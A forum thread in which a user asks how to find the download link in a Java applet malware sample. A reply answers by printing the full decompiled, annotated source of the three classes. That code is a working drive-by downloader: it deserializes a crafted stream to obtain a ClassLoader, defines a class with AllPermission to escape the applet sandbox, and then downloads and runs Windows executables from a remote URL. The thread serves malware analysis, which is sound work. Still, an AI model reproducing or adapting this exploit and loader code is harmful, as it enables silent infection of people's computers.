
Thread: JAVA malware

  1. #1
    BATMAN
    Guest

    JAVA malware

    How can I find the malicious link in this Java malware? I used a Java decompiler, but I haven't found the link... Please help (I'm not strong in Java).
    Here JAVA MALWARE
    password: infected

    P.S.Sorry for rules....
    Last edited by BATMAN; February 28th, 2010 at 06:18.

  2. #2
    Hi,

    So I guess you decompiled the Java classes and found that the strings are either encrypted or concatenated/appended together.
    It is also clear that it drops an .exe with a randomly generated name.

    You could try to patch the code so that it runs and capture the URL with a network sniffer, or you could collect every string and manually work through each manipulation. Note that in the decompiled code the download URL is read from the applet's "data" parameter (getParameter("data") in AppletX.init), so it lives in the HTML page that embeds the applet rather than in the class files.

    MALICIOUS CODE

    PX.class
    Code:
    // Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:43:59
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   PX.java
    
    package myf.y;
    
    import java.io.*;
    import java.net.URL;
    import java.security.AccessController;
    import java.security.PrivilegedExceptionAction;
    
    /**
     * Stage 2 of the applet: downloads one or more Windows executables and
     * runs them. LoaderX.bootstrapPayload defines this class under a
     * ProtectionDomain holding AllPermission, assigns {@code data} and
     * {@code cc} reflectively, then instantiates it; the constructor runs
     * {@link #run()} inside AccessController.doPrivileged.
     */
    public class PX
        implements PrivilegedExceptionAction
    {
    
        // Decodes a hex string (two digits per byte) into a byte array.
        // AppletX.init uses this to turn its hex literals into a Java
        // serialization stream. Input is expected to be even-length hex;
        // an odd-length input throws StringIndexOutOfBoundsException at
        // charAt(i + 1). s1 is never read (obfuscation filler).
        public static byte[] StringToBytes(String s)
        {
            byte abyte0[] = new byte[s.length() / 2];
            String s1 = "sdjffjjjjjjjjjjsdfsduuuujf8ds";
            for(int i = 0; i < s.length(); i += 2)
                abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
    
            return abyte0;
        }
    
        // Privileged action. For j in [0, cc): fetch "<data><j>", write the
        // body to a random-named .exe in java.io.tmpdir and, if at least
        // 1024 bytes arrived, execute it. Always returns null; every
        // exception is swallowed, so a failure leaves nothing for the
        // caller to observe. Does nothing unless data has been assigned
        // (LoaderX's first newInstance happens before the fields are set)
        // and os.name contains "Windows". s1, s4, s5 and s7 are never read.
        public Object run()
            throws Exception
        {
            if(data == null)
                return null;
            try
            {
                String s = "os.name";
                String s1 = "00057372001B6A6176612E7574696C2E477265676F7";
                String s2 = "Windows";
                String s3 = System.getProperty(s);
                String s4 = "00057372001B6A6176612E7574696C2E477265676Fasd7";
                if(s3.indexOf(s2) >= 0)
                {
                    // Download count: cc parsed as an int, default 1 when unset.
                    int i = 1;
                    if(cc != null)
                        i = Integer.parseInt(cc);
                    // data is the applet's "data" parameter (AppletX.init), so the
                    // download URL is in the embedding HTML page, not in the jar.
                    for(int j = 0; j < i; j++)
                    {
                        URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());
                        url.openConnection(); // result discarded; openStream below does the fetch
                        InputStream inputstream = url.openStream();
                        String s5 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                        // Drop location: <tmpdir>/<Math.random()>.exe
                        String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString();
                        FileOutputStream fileoutputstream = new FileOutputStream(s6);
                        int k;
                        int l;
                        // Unbuffered byte-by-byte copy; l counts bytes written.
                        // Neither stream is closed if read() or write() throws.
                        for(l = 0; (k = inputstream.read()) != -1; l++)
                            fileoutputstream.write(k);
    
                        inputstream.close();
                        fileoutputstream.close();
                        String s7 = "6E69656E744900166D696E696D616C44617973496E    46697273745765656B4900096E6578745374616D704   9001573657269616C56657273696F6E4F6E53747265   616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                        // Only launch files of at least 1 KiB (presumably to skip
                        // empty bodies or error pages) — the dropped file stays on disk.
                        if(l >= 1024)
                            Runtime.getRuntime().exec(s6);
                    }
    
                }
            }
            catch(Exception exception) { }
            return null;
        }
    
        // Runs run() as a privileged action. When this class was defined by
        // LoaderX.bootstrapPayload its ProtectionDomain holds AllPermission,
        // so the download/exec above runs outside the applet sandbox.
        // Exceptions are swallowed here as well.
        public PX()
        {
            try
            {
                AccessController.doPrivileged(this);
            }
            catch(Exception exception) { }
        }
    
        // Both are assigned reflectively by LoaderX.bootstrapPayload:
        // data = URL prefix to download from (applet param "data"),
        // cc   = number of downloads as a decimal string (applet param "cc", may be null).
        public static String data = null;
        public static String cc = null;
    
    }
    LoaderX.class
    Code:
    // Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:35:03
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   LoaderX.java
    
    package myf.y;
    
    import java.io.*;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.security.*;
    import java.security.cert.Certificate;
    
    /**
     * Serializable ClassLoader subclass. AppletX.init builds a serialization
     * stream whose hex contains this class's name ("myf.y.LoaderX") and
     * serialVersionUID, and deserializes it; {@link #readObject} then
     * publishes the deserialized instance through the static
     * {@code instance} field. Obtaining a ClassLoader this way (rather than
     * via a constructor) is presumably what lets the untrusted applet reach
     * {@code defineClass} with a permissive ProtectionDomain — the listing
     * does not show which JRE weakness makes that possible.
     */
    public class LoaderX extends ClassLoader
        implements Serializable
    {
    
        public LoaderX()
        {
        }
    
        // Default serialization; nothing custom is written.
        private void writeObject(ObjectOutputStream objectoutputstream)
            throws IOException, ClassNotFoundException
        {
            objectoutputstream.defaultWriteObject();
        }
    
        // Deserialization hook: records the freshly created instance in the
        // static field so AppletX.init can call bootstrapPayload on it.
        private void readObject(ObjectInputStream objectinputstream)
            throws IOException, ClassNotFoundException
        {
            instance = this;
            objectinputstream.defaultReadObject();
        }
    
        // Reads PX.class from the jar, defines it under a ProtectionDomain that
        // grants AllPermission, sets PX.data = s and PX.cc = s1 by reflection,
        // and instantiates PX (whose constructor runs the download/exec stage).
        //   s  - download URL prefix (applet param "data")
        //   s1 - download count as a string (applet param "cc", may be null)
        // Every exception is swallowed; obj is never used; the resource stream
        // is never closed; s2 is obfuscation filler.
        public void bootstrapPayload(String s, String s1)
            throws IOException
        {
            Object obj = null;
            try
            {
                ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
                byte abyte0[] = new byte[8192];
                InputStream inputstream = getClass().getResourceAsStream("/myf/y/PX.class");
                String s2 = "6E69656E744900166D696E696D616C446179734  96E46697273745765656B4900096E657874537461  6D7049001573657269616C56657273696F6E4F6E53  747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
                int i;
                while((i = inputstream.read(abyte0)) > 0) 
                    bytearrayoutputstream.write(abyte0, 0, i);
                abyte0 = bytearrayoutputstream.toByteArray();
                URL url = new URL("file:///"); // arbitrary CodeSource location; the permissions below are what matter
                Certificate acertificate[] = new Certificate[0];
                Permissions permissions = new Permissions();
                permissions.add(new AllPermission());
                ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);
                // Inherited ClassLoader.defineClass: PX is loaded with AllPermission.
                Class class1 = defineClass("myf.y.PX", abyte0, 0, abyte0.length, protectiondomain);
                if(class1 != null)
                {
                    Field field = class1.getField("data");
                    Field field1 = class1.getField("cc");
                    // First instance: PX.data is still null, so PX.run returns at once.
                    Object obj1 = class1.newInstance();
                    field.set(obj1, s);
                    field1.set(obj1, s1);
                    // Second instance: fields are now set, so the constructor's
                    // doPrivileged(run) performs the download and execution.
                    obj1 = class1.newInstance();
                }
            }
            catch(Exception exception) { }
        }
    
        // Matches the 5E8B4C67DDC409D8 embedded in AppletX.init's hex stream.
        private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;
        // Set by readObject; read by AppletX.init after deserialization.
        public static LoaderX instance = null;
    
    }
    AppletX.class
    Code:
    // Decompiled by DJ v3.9.9.91 Copyright 2005 Atanas Neshkov  Date: 28/02/2010 12:44:49
    // Home Page : http://members.fortunecity.com/neshkov/dj.html  - Check often for new version!
    // Decompiler options: packimports(3) 
    // Source File Name:   AppletX.java
    
    package myf.y;
    
    import java.applet.Applet;
    import java.io.ByteArrayInputStream;
    import java.io.ObjectInputStream;
    
    // Referenced classes of package myf.y:
    //            PX, LoaderX
    
    /**
     * Applet entry point (stage 1). init() assembles a hex-encoded Java
     * serialization stream from fragments (it starts with the stream magic
     * ACED0005 and a class descriptor for java.util.GregorianCalendar, and
     * further on contains "myf.y.LoaderX" with LoaderX's serialVersionUID),
     * deserializes it with a plain ObjectInputStream, and hands the applet's
     * "data"/"cc" parameters to the LoaderX instance that deserialization
     * produced. The many oddly named static fragments and the unused a5
     * look like padding intended to defeat string/signature matching.
     */
    public class AppletX extends Applet
    {
    
        // Builds serializedObject from the fragments; the field is never read
        // anywhere in this listing.
        public AppletX()
        {
            serializedObject = (new StringBuilder()).append("ACED").append(ff).append("269616E").append(a34).append("00A").toString();
        }
    
        // Assembles the serialization stream, deserializes it, then calls
        // LoaderX.instance.bootstrapPayload(data, cc). "data" defaults to ""
        // when absent; "cc" is passed through as-is (null means 1 download in
        // PX.run). All exceptions are swallowed.
        public void init()
        {
            try
            {
                String s = "000000";
                String s1 = "5469";
                String s2 = (new StringBuilder()).append("0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973").append(s1).append("6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F").append(s1).append("6D655A6F6E653B787001").append(s).append("010101").append(s).append("01").append(s).append("02").append(s).append("0100000121563A").toString();
                String s3 = (new StringBuilder()).append("200014A").append(s2).append("FC0E757200025B494DBA602676EAB2A5020000787").append(s).append("011").append(s).append("01000007D9").append(s).append("04").append(s).append("15").append(s).append("04").append(s).append("12").append(s).append("8A").append(s).append("02").append(s).append("03").append(s).append("01").append(s).append("04").append(s).append("1").append(s).append("011").append(s).append("22000002DEFE488C").append(s).append("0000757200025B5A578F203914B85DE2020000787").append(s).append("0110101010101010").toString();
                String s4 = (new StringBuilder()).append("6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64").append(s1).append("6D6549000B656E64").append(s1).append("6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D490008737461727444617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374617274").append(s1).append("6D6549000D7374617274").append(s1).append("6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E").append(s1).append("6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D65726963612F446177736F6E0036EE8").append(s).append("000000000").append(s).append("000000").append(s).append("000000").append(s).append("0000FE4").toString();
                // Deserializing attacker-controlled bytes with an unfiltered
                // ObjectInputStream; the stream's GregorianCalendar/SimpleTimeZone
                // wrapper carries the LoaderX object whose readObject sets LoaderX.instance.
                ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes((new StringBuilder()).append("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10").append(s3).append("101010101010101010101737200186A6176612E7574696C2E53696D706C65").append(s1).append("6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E").append(s4).append("88C").append(s).append("0002").append(s).append("000000").append(s).append("000000").append(s).append("000000").append(s).append("000000").append(s).append("0000757200025B42ACF317F8060854E0020000787").append(s).append("00C1F1C1F1E1F1E1F1F1E1F1E1F770A").append(s).append("06").append(s).append("0000007571007E0006").append(s).append("02").append(s).append("0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A").toString())));
                Object obj = objectinputstream.readObject();
                if(obj != null && LoaderX.instance != null)
                {
                    // The download URL and count come from the <applet> parameters
                    // in the embedding HTML page, not from the class files.
                    String s5 = getParameter("data");
                    String s6 = getParameter("cc");
                    if(s5 == null)
                        s5 = "";
                    LoaderX.instance.bootstrapPayload(s5, s6);
                }
            }
            catch(Exception exception) { }
        }
    
        private static final long serialVersionUID = 0xd30f41af207ff1c8L;
        // Hex fragments of the serialization stream; assembled in the static
        // initializer into a34, which only the (unused) constructor string reads.
        private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";
        private static String as;
        private static String afc;
        private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha;
        private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha;
        private static String lol;
        private static String kol;
        private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj;
        private static String kkk;
        private static String asa;
        private static String abc;
        // Never read; junk text.
        private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";
        private static String klls;
        private static String a1;
        private static String a2;
        private static String a31;
        private static String a32;
        private static String a33;
        public static String a34;
        // Assigned in the constructor; not read in this listing.
        private final String serializedObject;
        // Not read in this listing (PX.data is the field that matters).
        public static String data = null;
    
        // Builds a34 from the fragments above. a1 ends with the same
        // "myf.y.LoaderX" + serialVersionUID bytes that init() embeds.
        static 
        {
            as = "00000";
            afc = "44461794";
            afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";
            afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
            lol = "73657269616C56657273696F6E4F6E53747265616D4900087";
            kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";
            gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E4";
            kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";
            asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A603001249000A64737453";
            abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449";
            klls = (new StringBuilder()).append("87001").append(as).append("0010101").append(as).append("001").append(as).append("002").append(as).append("001").append(as).append("121563AFC0E757200025B494DBA602676EAB2A5020000787").append(as).append("0011").append(as).append("001").append(as).append("7D9").append(as).append("004").append(as).append("015").append(as).append("004").append(as).append("012").append(as).append("08A").append(as).append("002").append(as).append("003").append(as).append("001").append(as).append("004").append(as).append("01").append(as).append("0011").append(as).append("022").append(as).append("2DEFE488C").append(as).append("00000757200025B5A578F203914B85DE2020000787").append(as).append("00110101010101010101").append(asa).append("6176696E6773490006656E6").append(afc).append("9000C656E6").append(afc).append("F665765656B490007656E644D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("8656E644D").append(kol).append("54D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97261774F6666736574490015").append(lol).append("37461727").append(afc).append("9000E737461727").append(afc).append("F665765656B49000973746172744D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("A73").toString();
            a1 = (new StringBuilder()).append("0007571007E0006").append(as).append("002").append(as).append("00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E").toString();
            a2 = (new StringBuilder()).append("61727").append(gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj).append("16D65726963612F446177736F6E0036EE8").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("0000FE488C0000000002").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("00000").append(as).append("000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A").append(as).append("006").append(as).append("0000").append(a1).append("2F96").toString();
            a31 = (new StringBuilder()).append("9697354696D655365745A00076C65").append(afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha).append("F6E6").toString();
            a32 = (new StringBuilder()).append("000").append(a31).append("53B7").append(klls).append("74617").append(kkk).append("27454696D654D6F").append(afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha).append("97374").append(a2).append("4A").toString();
            a33 = (new StringBuilder()).append("C656E6461728F3DD7D6E5").append(abc).append("000E666972737").append(afc).append("F665").toString();
            a34 = (new StringBuilder()).append("43616").append(a33).append("765656B5A").append(a32).append("C0").toString();
        }
    }
    Last edited by Silkut; February 28th, 2010 at 06:53. Reason: biohazard code added (non executable)

  3. #3
    BATMAN
    Guest
    Maybe there is a way to debug it?

